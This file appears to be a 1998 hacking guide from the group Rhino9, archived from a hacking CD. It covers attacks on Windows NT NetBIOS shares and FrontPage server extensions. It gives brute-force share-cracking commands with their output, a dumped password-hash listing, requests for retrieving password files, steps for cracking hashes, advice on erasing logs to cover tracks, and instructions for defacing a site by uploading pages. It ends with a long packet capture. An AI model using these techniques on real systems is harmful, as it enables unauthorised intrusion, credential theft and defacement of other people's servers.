home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / misc / r9-frontpage-netbios.txt < prev    next >
Text File  |  2001-07-11  |  42KB  |  795 lines

  1. ==========Windows NT Vulnerabilities Version 2==================================
  2.                    by Vacuum & Chame|eon of Rhino9
  3.                            [www.rhino9.org]      
  4.         [http://www.technotronic.com -- vacuum@technotronic.com]
  5.                           March 11,1998
  6. Nothing changed in this updated version other than a few minor spelling errors
  7. and irrelevant information removed. Enjoy.
  8.  
  9. Frontpage (Hacking) Don't Let Others fool you chame|eon and I were the first to
  10. decrypt service.pwd files.
  11.  
  12. NetBIOS Shares in depth.
  13.  
  14. All mentioned programs available at www.technotronic.com
  15.  
  16. ==========NetBIOS Attack Program==================================
  17.  
  18. Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,
  19. NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1
  20.  
  21. NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
  22.  
  23. OPTIONS
  24.        -o     Specify the output file.  All results from the scan
  25.               will  be written to the specified file, in addition
  26.               to standard output.
  27.        -u     Specify the file to read usernames from.  Usernames
  28.               will  be read from the specified file when attempt-
  29.               ing to guess the password  on  the  remote  server.
  30.               Usernames  should appear one per line in the speci-
  31.               fied file.
  32.        -p     Specify the file to read passwords from.  Passwords
  33.               will  be read from the specified file when attempt-
  34.               ing to guess the password  on  the  remote  server.
  35.               Passwords  should appear one per line in the speci-
  36.               fied file.
  37.        <address>
  38.               Addresses should be specified in comma  deliminated
  39.               format,  with  no spaces.  Valid address specifica-
  40.               tions include:
  41.               hostname - "hostname" is added
  42.               127.0.0.1-127.0.0.3,   adds   addresses   127.0.0.1
  43.               through 127.0.0.3
  44.               127.0.0.1-3,   adds   addresses  127.0.0.1  through
  45.               127.0.0.3
  46.               127.0.0.1-3,7,10-20,   adds   addresses   127.0.0.1
  47.               through  127.0.0.3,  127.0.0.7,  127.0.0.10 through
  48.               127.0.0.20.
  49.               hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
  50.               through 127.0.0.1
  51.               All combinations of hostnames and address ranges as
  52.               specified above are valid.
  53.  
  54.  
  55.  
  56. Note that NAT.EXE will ip scan for netbios shares as performed above.
  57.  
  58. Comparing NAT.EXE to Microsoft's own executables:
  59.  
  60.  
  61. C:\nbtstat -A 204.73.131.11
  62.  
  63.        NetBIOS Remote Machine Name Table
  64.  
  65.    Name               Type         Status
  66. ---------------------------------------------
  67. STUDENT1       <20>  UNIQUE      Registered
  68. STUDENT1       <00>  UNIQUE      Registered
  69. DOMAIN1        <00>  GROUP       Registered
  70. DOMAIN1        <1C>  GROUP       Registered
  71. DOMAIN1        <1B>  UNIQUE      Registered
  72. STUDENT1       <03>  UNIQUE      Registered
  73. DOMAIN1        <1E>  GROUP       Registered
  74. DOMAIN1        <1D>  UNIQUE      Registered
  75. ..__MSBROWSE__.<01>  GROUP       Registered
  76.  
  77. MAC Address = 00-C0-4F-C4-8C-9D
  78.  
  79. Here is a partial NetBIOS 16th bit listing:
  80.  
  81. Computername <00> UNIQUE workstation service name
  82.              <00> GROUP  domain name 
  83. Server       <20> UNIQUE Server Service name
  84.  
  85. Computername <03> UNIQUE Registered by the messenger service. This is the computername
  86.                          to be added to the LMHOSTS file which is not necessary to use
  87.                          NAT.EXE but is necessary if you would like to view the remote
  88.                          computer in Network Neighborhood.
  89. Username     <03>        Registered by the messenger service. 
  90. Domainname   <1B>        Registers the local computer as the master browser for the domain
  91. Domainname   <1C>        Registers the computer as a domain controller for the domain
  92.                          (PDC or BDC)
  93. Domainname   <1D>        Registers the local client as the local segments master browser
  94.                          for the domain
  95. Domainname   <1E>        Registers as a Group NetBIOS Name
  96.              <BF>        Network Monitor Name
  97.              <BE>        Network Monitor Agent
  98.              <06>        RAS Server
  99.              <1F>        Net DDE
  100.              <21>        RAS Client
  101.  
  102. C:\net view 204.73.131.11
  103. Shared resources at 204.73.131.11
  104.  
  105.  
  106.  
  107. Share name   Type         Used as  Comment
  108.  
  109. ------------------------------------------------------------------------------
  110. NETLOGON     Disk                  Logon server share
  111. Test         Disk
  112. The command completed successfully.
  113.  
  114. NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
  115.  
  116.  
  117. C:\net use /?
  118. The syntax of this command is:
  119.  
  120.  
  121. NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
  122.         [/USER:[domainname\]username]
  123.         [[/DELETE] | [/PERSISTENT:{YES | NO}]]
  124.  
  125. NET USE [devicename | *] [password | *]] [/HOME]
  126.  
  127. NET USE [/PERSISTENT:{YES | NO}]
  128.  
  129.  
  130. C:\net use x: \\204.73.131.11\test
  131. The command completed successfully.
  132.  
  133.  
  134.  
  135.  
  136. C:\unzipped\nat10bin>net use
  137. New connections will be remembered.
  138.  
  139.  
  140. Status       Local     Remote                    Network
  141.  
  142. -------------------------------------------------------------------------------
  143. OK           X:        \\204.73.131.11\test      Microsoft Windows Network
  144. OK                     \\204.73.131.11\test      Microsoft Windows Network
  145. The command completed successfully.
  146.  
  147. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
  148.  
  149.  
  150. [*]--- Reading usernames from userlist.txt
  151. [*]--- Reading passwords from passlist.txt
  152.  
  153. [*]--- Checking host: 204.73.131.11
  154. [*]--- Obtaining list of remote NetBIOS names
  155.  
  156. [*]--- Attempting to connect with name: *
  157. [*]--- Unable to connect
  158.  
  159. [*]--- Attempting to connect with name: *SMBSERVER
  160. [*]--- CONNECTED with name: *SMBSERVER
  161. [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
  162. [*]--- Server time is Mon Dec 01 07:44:34 1997
  163. [*]--- Timezone is UTC-6.0
  164. [*]--- Remote server wants us to encrypt, telling it not to
  165.  
  166. [*]--- Attempting to connect with name: *SMBSERVER
  167. [*]--- CONNECTED with name: *SMBSERVER
  168. [*]--- Attempting to establish session
  169. [*]--- Was not able to establish session with no password
  170. [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
  171. [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
  172.  
  173. [*]--- Obtained server information:
  174.  
  175. Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
  176.  
  177. [*]--- Obtained listing of shares:
  178.  
  179.     Sharename      Type      Comment
  180.     ---------      ----      -------
  181.     ADMIN$         Disk:     Remote Admin
  182.     C$             Disk:     Default share
  183.     IPC$           IPC:      Remote IPC
  184.     NETLOGON       Disk:     Logon server share 
  185.     Test           Disk:     
  186.  
  187. [*]--- This machine has a browse list:
  188.  
  189.     Server               Comment
  190.     ---------            -------
  191.     STUDENT1             
  192.  
  193.  
  194. [*]--- Attempting to access share: \\*SMBSERVER\
  195. [*]--- Unable to access
  196.  
  197. [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
  198. [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
  199. [*]--- Checking write access in: \\*SMBSERVER\ADMIN$
  200. [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
  201. [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
  202.  
  203. [*]--- Attempting to access share: \\*SMBSERVER\C$
  204. [*]--- WARNING: Able to access share: \\*SMBSERVER\C$
  205. [*]--- Checking write access in: \\*SMBSERVER\C$
  206. [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
  207. [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
  208.  
  209. [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
  210. [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
  211. [*]--- Checking write access in: \\*SMBSERVER\NETLOGON
  212. [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
  213.  
  214. [*]--- Attempting to access share: \\*SMBSERVER\Test
  215. [*]--- WARNING: Able to access share: \\*SMBSERVER\Test
  216. [*]--- Checking write access in: \\*SMBSERVER\Test
  217. [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
  218.  
  219. [*]--- Attempting to access share: \\*SMBSERVER\D$
  220. [*]--- Unable to access
  221.  
  222. [*]--- Attempting to access share: \\*SMBSERVER\ROOT
  223. [*]--- Unable to access
  224.  
  225. [*]--- Attempting to access share: \\*SMBSERVER\WINNT$
  226. [*]--- Unable to access
  227.  
  228. If Default share of Everyone/Full Control. Done it is hacked.
  229.  
  230.  
  231. ==========Frontpage Extension Scanner & Cracker========================
  232.     
  233.  
  234. NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password".
  235.  
  236. Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
  237. Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
  238. STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
  239. ketan:1005:********************************:********************************:::
  240. mari:1006:********************************:********************************:::
  241. meng:1007:********************************:********************************:::
  242. IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
  243.  
  244. The #haccess.ctl file:
  245.  
  246. # -FrontPage-
  247.  
  248. Options None
  249.  
  250. <Limit GET POST PUT>
  251. order deny,allow
  252. deny from all
  253. </Limit>
  254. AuthName default_realm
  255. AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
  256. AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
  257.  
  258. Executing fpservwin.exe allows frontpage server extensions to be installed on
  259.  
  260. port 443 (HTTPS)Secure Sockets Layer
  261. port 80  (HTTP)
  262.  
  263. NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
  264. instead of Frontpage.
  265.  
  266. The following is a list of the Internet Information server files location
  267. in relation to the local hard drive (C:) and the web (www.target.com)
  268.  
  269. C:\InetPub\wwwroot                               <Home>
  270. C:\InetPub\scripts                               /Scripts
  271. C:\InetPub\wwwroot\_vti_bin                      /_vti_bin
  272. C:\InetPub\wwwroot\_vti_bin\_vti_adm             /_vti_bin/_vti_adm
  273. C:\InetPub\wwwroot\_vti_bin\_vti_aut             /_vti_bin/_vti_aut
  274. C:\InetPub\cgi-bin                               /cgi-bin
  275. C:\InetPub\wwwroot\srchadm                       /srchadm
  276. C:\WINNT\System32\inetserv\iisadmin              /iisadmin
  277. C:\InetPub\wwwroot\_vti_pvt               
  278. C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM   Internet Information Index Server sample
  279. C:\Program Files\Microsoft FrontPage\_vti_bin
  280. C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
  281. C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
  282. C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm  /iisadmin/isadmin
  283.  
  284. NOTE: If Index Information Server running under Internet Information Server.
  285. service.pwd is our goal, although lots of servers are not password protected
  286. and can be exploited easily. queryhit.htm if found can be used to get service.pwd
  287. search for
  288. "#filename=*.pwd" 
  289.  
  290. Systems by default will have ftp service running.
  291. C:\InetPub\ftproot is the default location for the ftp service which
  292. by default runs on the standard port 21.
  293. Select the Allow Anonymous Connections check box to allow users using the username "anonymous" to log into your FTP server. Use the User Name and Password dialog boxes to establish the WindowsáNT user account to use for permissions for all anonymous connections. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within WindowsáNT ; anonymous users do not log on using this user name and password.
  294.  
  295. Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions.
  296. When you installed Internet Information Server, Setup created the account IUSR_computername in the WindowsáNT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the WindowsáNT User Manager for Domains. If you change the password, you must change it in both places and make sure it matches.
  297.  
  298.  
  299.  
  300. FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to: 
  301.  
  302. service.pwd contains the list of users and passwords for the FrontPage web. 
  303. service.grp contains the list of groups (one group for authors and one for administrators in FrontPage). 
  304. On Netscape servers, there are no service.grp files. The Netscape password files are: 
  305.  
  306. administrators.pwd for administrators 
  307. authors.pwd for authors and administrators 
  308. users.pwd for users, authors, and administrators 
  309.  
  310.  
  311. NOTE: Name and password are case sensitive
  312. Scanning PORT 80 or 443 options:
  313.  
  314. GET /_vti_inf.html                 #Ensures that frontpage server extensions
  315.                                     are installed. 
  316. GET /_vti_pvt/service.pwd          #Contains the encrypted password files.
  317.                                     Not used on IIS and WebSite servers
  318. GET /_vti_pvt/authors.pwd          #On Netscape servers only. Encrypted
  319.                                     names and passwords of authors.
  320. GET /_vti_pvt/administrators.pwd
  321. GET /_vti_log/author.log           #If author.log is there it will need to
  322.                                     be cleaned to cover your tracks
  323.  
  324. GET /samples/search/queryhit.htm   
  325.  
  326. Other ways of obtaining service.pwdhttp://ftpsearch.com/index.html
  327. search for service.pwdhttp://www.alstavista.digital.com
  328. advanced search for link:"/_vti_pvt/service.pwd"
  329. Attempt to connect to the server using FTP.
  330. port 21 
  331. login anonymous
  332. password guest@unknown
  333. the anonymous login will use the internally created IISUSR_computername
  334. account to assign NT permissions.
  335. An incorrect configuration may leave areas vulnerable to attack.
  336.  
  337. If service.pwd is obtained it will look similar to this:
  338. Vacuum:SGXJVl6OJ9zkE
  339.  
  340. The above password is apple
  341. Turn it into DES format:
  342.  
  343. Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
  344.  
  345. The run your favorite unix password cracker like John The Ripper
  346.  
  347. Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
  348.  
  349. Flags: -pwfile:<file>[,..]   specify passwd file(s) (wildcards allowed)
  350.        -wordfile:<file>      specify wordlist file
  351.        -restore[:<file>]     restore session [from <file>]
  352.        -user:login|uid[,..]  only crack this (these) user(s)
  353.        -timeout:<time>       abort session after a period of <time> minutes
  354.        -incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
  355.        -single               single crack mode
  356.        -stdin                read words from stdin
  357.        -list                 list each word
  358.        -test                 perform a benchmark
  359.        -beep                 beep when a password is found
  360.        -quiet                do not beep when a password is found (default)
  361.        -noname               don't use memory for login names
  362.  
  363. Other ways of obtaining service.pwd
  364. http://ftpsearch.com/index.html
  365. search for service.pwd
  366. http://www.alstavista.digital.com
  367. advanced search for link:"/_vti_pvt/service.pwd"
  368.  
  369. To open a FrontPage web
  370.  
  371. On the FrontPage ExplorerÆs File menu, choose Open FrontPage Web.
  372. In the Getting Started dialog box, select Open an Existing FrontPage
  373. Web and choose the FrontPage web you want to open.
  374. Click More Webs if the web you want to open is not listed.
  375. Click OK.
  376. If you are prompted for your author name and password, you will have
  377. to decrypt service.pwd, guess or move on.
  378. Enter them in the Name and Password Required dialog box, and click OK.
  379. Alter the existing page, or upload a page of your own.
  380.  
  381. I have captured the entire hack from connection, to password authentication,
  382. to the actual page upload.
  383.  
  384. To view this file, you will need to use Windows NT's Network monitor
  385. and open the file vac.cap
  386.  
  387.  
  388. =====Sniffing ==============================================================
  389. Running a packet sniffer to see the actual determining of shares:
  390. NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) 
  391. This frame is a NetShareEnum request, which requests a list of shared resources.
  392. 19 31.348 STUDENT7 *SMBSERVER       R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) STUDENT7 *SMBSERVER       IP 
  393. FRAME: Base frame properties    FRAME: Time of capture = Dec 3, 1997 9:12:54.18
  394.     FRAME: Time delta from previous physical frame: 0 milliseconds
  395.     FRAME: Frame number: 19    FRAME: Total frame length: 238 bytes
  396.     FRAME: Capture frame length: 238 bytes
  397.     FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
  398. ETHERNET: ETYPE = 0x0800 : Protocol = IP:  DOD Internet Protocol
  399.     ETHERNET: Destination address : 00C04FC48C9D
  400.         ETHERNET: .......0 = Individual address
  401.         ETHERNET: ......0. = Universally administered address
  402.     ETHERNET: Source address : 00C04FC48C93
  403.         ETHERNET: .......0 = No routing information present
  404.         ETHERNET: ......0. = Universally administered address
  405.     ETHERNET: Frame Length : 238 (0x00EE)
  406.     ETHERNET: Ethernet Type : 0x0800 (IP:  DOD Internet Protocol)
  407.     ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
  408. IP: ID = 0x1A08; Proto = TCP; Len: 224    IP: Version = 4 (0x4)
  409.     IP: Header Length = 20 (0x14)    IP: Service Type = 0 (0x0)
  410.         IP: Precedence = Routine        IP: ...0.... = Normal Delay
  411.         IP: ....0... = Normal Throughput
  412.         IP: .....0.. = Normal Reliability    IP: Total Length = 224 (0xE0)
  413.     IP: Identification = 6664 (0x1A08)    IP: Flags Summary = 2 (0x2)
  414.         IP: .......0 = Last fragment in datagram
  415.         IP: ......1. = Cannot fragment datagram
  416.     IP: Fragment Offset = 0 (0x0) bytes    IP: Time to Live = 128 (0x80)
  417.     IP: Protocol = TCP - Transmission Control    IP: Checksum = 0x415E
  418.     IP: Source Address = 204.73.131.19
  419.     IP: Destination Address = 204.73.131.11
  420.     IP: Data: Number of data bytes remaining = 204 (0x00CC)
  421. TCP: .AP..., len:  184, seq:  73409249-73409432, ack:   1505236, win: 8278, src: 1832  dst:  139 (NBT Session) 
  422.     TCP: Source Port = 0x0728    TCP: Destination Port = NETBIOS Session Service
  423.     TCP: Sequence Number = 73409249 (0x46022E1)
  424.     TCP: Acknowledgement Number = 1505236 (0x16F7D4)
  425.     TCP: Data Offset = 20 (0x14)    TCP: Reserved = 0 (0x0000)
  426.     TCP: Flags = 0x18 : .AP...        TCP: ..0..... = No urgent data
  427.         TCP: ...1.... = Acknowledgement field significant
  428.         TCP: ....1... = Push function        TCP: .....0.. = No Reset
  429.         TCP: ......0. = No Synchronize        TCP: .......0 = No Fin
  430.     TCP: Window = 8278 (0x2056)    TCP: Checksum = 0x40ED
  431.     TCP: Urgent Pointer = 0 (0x0)
  432.     TCP: Data: Number of data bytes remaining = 184 (0x00B8)
  433. NBT: SS: Session Message, Len: 180    NBT: Packet Type = Session Message
  434.     NBT: Packet Flags = 0 (0x0)        NBT: .......0 = Add 0 to Length
  435.     NBT: Packet Length = 180 (0xB4)
  436.     NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
  437. SMB: C transact TransactNmPipe, FID = 0x800    SMB: SMB Status = Error Success
  438.         SMB: Error class = No Error        SMB: Error code = No Error
  439.     SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
  440.         SMB: Tree ID      (TID) = 2048 (0x800)
  441.         SMB: Process ID   (PID) = 31936 (0x7CC0)
  442.         SMB: User ID      (UID) = 2048 (0x800)
  443.         SMB: Multiplex ID (MID) = 192 (0xC0)
  444.         SMB: Flags Summary = 24 (0x18)
  445.             SMB: .......0 = Lock & Read and Write & Unlock not supported
  446.             SMB: ......0. = Send No Ack not supported
  447.             SMB: ....1... = Using caseless pathnames
  448.             SMB: ...1.... = Canonicalized pathnames
  449.             SMB: ..0..... = No Opportunistic lock
  450.             SMB: .0...... = No Change Notify
  451.             SMB: 0....... = Client command
  452.         SMB: flags2 Summary = 32771 (0x8003)
  453.             SMB: ...............1 = Understands long filenames
  454.             SMB: ..............1. = Understands extended attributes
  455.             SMB: ...0............ = No DFS capabilities
  456.             SMB: ..0............. = No paging of IO
  457.             SMB: .0.............. = Using SMB status codes
  458.             SMB: 1............... = Using UNICODE strings
  459.     SMB: Command = R transact        SMB: Word count = 16
  460.         SMB: Word parameters        SMB: Total parm bytes = 0
  461.         SMB: Total data bytes = 96        SMB: Max parm bytes = 0
  462.         SMB: Max data bytes = 1024        SMB: Max setup words = 0 (0x0)
  463.         SMB: Transact Flags Summary = 0 (0x0)
  464.             SMB: ...............0 = Leave session intact
  465.             SMB: ..............0. = Response required
  466.         SMB: Transact timeout = 0 (0x0)        SMB: Parameter bytes = 0 (0x0)
  467.         SMB: Parameter offset = 84 (0x54)        SMB: Data bytes = 96 (0x60)
  468.         SMB: Data offset = 84 (0x54)        SMB: Max setup words = 2
  469.         SMB: Setup words
  470.         SMB: Pipe function = Transact named pipe (TransactNmPipe)
  471.         SMB: File ID (FID) = 2048 (0x800)        SMB: Byte count = 113
  472.         SMB: Byte parameters        SMB: File name = \PIPE\
  473.         SMB: Transaction data
  474.     SMB: Data: Number of data bytes remaining = 96 (0x0060)
  475. MSRPC: c/o RPC Request:      call 0x1  opnum 0xF  context 0x0  hint 0x48
  476.     MSRPC: Version = 5 (0x5)    MSRPC: Version (Minor) = 0 (0x0)
  477.     MSRPC: Packet Type = Request    MSRPC: Flags 1 = 3 (0x3)
  478.         MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
  479.         MSRPC: ......1. = Last fragment -or- Cancel pending
  480.         MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
  481.         MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
  482.         MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
  483.         MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
  484.         MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
  485.         MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
  486.     MSRPC: Packed Data Representation    MSRPC: Fragment Length = 96 (0x60)
  487.     MSRPC: Authentication Length = 0 (0x0)    MSRPC: Call Identifier = 1 (0x1)
  488.     MSRPC: Bind Frame Number = 17 (0x11)
  489.     MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
  490.     MSRPC: Allocation Hint = 72 (0x48)
  491.     MSRPC: Presentation Context Identifier = 0 (0x0)
  492.     MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
  493.     MSRPC: Stub DataR_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
  494.     R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
  495.     R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
  496.         R_SRVSVC: DWORD Level = 1 (0x1)
  497.         R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
  498.             R_SRVSVC: Switch Value = 1 (0x1)
  499.             R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
  500.                 R_SRVSVC: DWORD EntriesRead = 0 (0x0)
  501.                 R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
  502.     R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)
  503. 00000:  00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00   ..O.....O.....E.
  504. 00010:  00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49   ....@...A^.I...I
  505. 00020:  83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18   ...(...`".....P.
  506. 00030:  20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00    V@........SMB%.
  507. 00040:  00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00   ......$.........
  508. 00050:  00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00   .....|.......`..
  509. 00060:  00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54   ...............T
  510. 00070:  00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00   .`.T...&...q..\.
  511. 00080:  50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00   P.I.P.E.\....-..
  512. 00090:  00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00   ......`.......H.
  513. 000A0:  00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00   ......6.........
  514. 000B0:  00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00   ......2.0.4...7.
  515. 000C0:  33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00   3...1.3.1...1.1.
  516. 000D0:  00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00   ................
  517. 000E0:  00 00 00 00 00 00 FF FF FF FF 00 00 00 00         ..............  
  518. This is the response to the above share request:
  519. 27 31.376 *SMBSERVER       STUDENT7 R_SRVSVC RPC Server response srvsvc:NetrServerGetInfo(..) *SMBSERVER       STUDENT7 IP 
  520. FRAME: Base frame properties    FRAME: Time of capture = Dec 3, 1997 9:12:54.46
  521.     FRAME: Time delta from previous physical frame: 7 milliseconds
  522.     FRAME: Frame number: 27    FRAME: Total frame length: 230 bytes
  523.     FRAME: Capture frame length: 230 bytes
  524.     FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
  525. ETHERNET: ETYPE = 0x0800 : Protocol = IP:  DOD Internet Protocol
  526.     ETHERNET: Destination address : 00C04FC48C93
  527.         ETHERNET: .......0 = Individual address
  528.         ETHERNET: ......0. = Universally administered address
  529.     ETHERNET: Source address : 00C04FC48C9D
  530.         ETHERNET: .......0 = No routing information present
  531.         ETHERNET: ......0. = Universally administered address
  532.     ETHERNET: Frame Length : 230 (0x00E6)
  533.     ETHERNET: Ethernet Type : 0x0800 (IP:  DOD Internet Protocol)
  534.     ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
  535. IP: ID = 0x3C0E; Proto = TCP; Len: 216    IP: Version = 4 (0x4)
  536.     IP: Header Length = 20 (0x14)    IP: Service Type = 0 (0x0)
  537.         IP: Precedence = Routine        IP: ...0.... = Normal Delay
  538.         IP: ....0... = Normal Throughput
  539.         IP: .....0.. = Normal Reliability    IP: Total Length = 216 (0xD8)
  540.     IP: Identification = 15374 (0x3C0E)    IP: Flags Summary = 2 (0x2)
  541.         IP: .......0 = Last fragment in datagram
  542.         IP: ......1. = Cannot fragment datagram
  543.     IP: Fragment Offset = 0 (0x0) bytes    IP: Time to Live = 128 (0x80)
  544.     IP: Protocol = TCP - Transmission Control    IP: Checksum = 0x1F60
  545.     IP: Source Address = 204.73.131.11
  546.     IP: Destination Address = 204.73.131.19
  547.     IP: Data: Number of data bytes remaining = 196 (0x00C4)
  548. TCP: .AP..., len:  176, seq:   1506074-1506249, ack:  73409903, win: 7314, src:  139 (NBT Session)  dst: 1832 
  549.     TCP: Source Port = NETBIOS Session Service    TCP: Destination Port = 0x0728
  550.     TCP: Sequence Number = 1506074 (0x16FB1A)
  551.     TCP: Acknowledgement Number = 73409903 (0x460256F)
  552.     TCP: Data Offset = 20 (0x14)    TCP: Reserved = 0 (0x0000)
  553.     TCP: Flags = 0x18 : .AP...        TCP: ..0..... = No urgent data
  554.         TCP: ...1.... = Acknowledgement field significant
  555.         TCP: ....1... = Push function        TCP: .....0.. = No Reset
  556.         TCP: ......0. = No Synchronize        TCP: .......0 = No Fin
  557.     TCP: Window = 7314 (0x1C92)    TCP: Checksum = 0x7C1E
  558.     TCP: Urgent Pointer = 0 (0x0)
  559.     TCP: Data: Number of data bytes remaining = 176 (0x00B0)
  560. NBT: SS: Session Message, Len: 172    NBT: Packet Type = Session Message
  561.     NBT: Packet Flags = 0 (0x0)        NBT: .......0 = Add 0 to Length
  562.     NBT: Packet Length = 172 (0xAC)
  563.     NBT: SS Data: Number of data bytes remaining = 172 (0x00AC)
  564. SMB: R transact TransactNmPipe (response to frame 26)
  565.     SMB: SMB Status = Error Success        SMB: Error class = No Error
  566.         SMB: Error code = No Error
  567.     SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800
  568.         SMB: Tree ID      (TID) = 2048 (0x800)
  569.         SMB: Process ID   (PID) = 31936 (0x7CC0)
  570.         SMB: User ID      (UID) = 2048 (0x800)
  571.         SMB: Multiplex ID (MID) = 448 (0x1C0)
  572.         SMB: Flags Summary = 152 (0x98)
  573.             SMB: .......0 = Lock & Read and Write & Unlock not supported
  574.             SMB: ......0. = Send No Ack not supported
  575.             SMB: ....1... = Using caseless pathnames
  576.             SMB: ...1.... = Canonicalized pathnames
  577.             SMB: ..0..... = No Opportunistic lock
  578.             SMB: .0...... = No Change Notify
  579.             SMB: 1....... = Server response
  580.         SMB: flags2 Summary = 32771 (0x8003)
  581.             SMB: ...............1 = Understands long filenames
  582.             SMB: ..............1. = Understands extended attributes
  583.             SMB: ...0............ = No DFS capabilities
  584.             SMB: ..0............. = No paging of IO
  585.             SMB: .0.............. = Using SMB status codes
  586.             SMB: 1............... = Using UNICODE strings
  587.     SMB: Command = R transact        SMB: Word count = 10
  588.         SMB: Word parameters        SMB: Total parm bytes = 0
  589.         SMB: Total data bytes = 116        SMB: Parameter bytes = 0 (0x0)
  590.         SMB: Parameter offset = 56 (0x38)
  591.         SMB: Parameter Displacement = 0 (0x0)
  592.         SMB: Data bytes = 116 (0x74)        SMB: Data offset = 56 (0x38)
  593.         SMB: Data Displacement = 0 (0x0)        SMB: Max setup words = 0
  594.         SMB: Byte count = 117        SMB: Byte parameters
  595.         SMB: Pipe function = Transact named pipe (TransactNmPipe)
  596.     SMB: Data: Number of data bytes remaining = 116 (0x0074)
  597. MSRPC: c/o RPC Response:     call 0x1  context 0x0  hint 0x5C  cancels 0x0
  598.     MSRPC: Version = 5 (0x5)    MSRPC: Version (Minor) = 0 (0x0)
  599.     MSRPC: Packet Type = Response    MSRPC: Flags 1 = 3 (0x3)
  600.         MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
